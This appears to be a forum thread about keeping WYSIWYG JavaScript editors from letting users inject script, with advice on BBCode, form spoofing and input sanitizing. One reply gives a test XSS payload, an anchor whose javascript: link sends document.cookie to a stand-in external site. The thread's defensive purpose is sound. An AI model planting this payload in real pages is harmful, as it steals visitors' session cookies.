WYSIWYG JS Editors and Web attacks

They *should* not allow inserting javascript, but always, try your best at inserting things like

<a href="javascript:location='www.somesite.com?cookies='+document.cookie">nice stuff!!</a>

if this ends up in your site, and the editor didn't block it, something is wrong.

set your editors NOT to produce html, but some other, of the many kinds of enhanced text
like bbcode that is used to add [b]bold[/b] code highlighting and text effects in these forums, daniweb,
thats why alternate forms exist
the script handles the code and produces html, there is no chance of html injection

Be aware that your forms can be spoofed. I could set up a form identical to yours on my server and send it to yours if I know the 'action' attribute value. Even if you try to hide it with ajax, I could find it by printing the js file. So, your protection will come from validating and sanitizing your incoming data. I never presume that POST data actually comes from my site. There are a few things you can try in order to detect an off-site post though, but I don't know how secure these are these days. $_SERVER, etc. It may be possible to spoof these too.

Thanks budddies, I found HTML purifier filter. Do anyone know how Strong it is? And How to set My editor to produce BBCode? and how do I convert BBCode to HTML so that I can display it in a browser?
Thanks!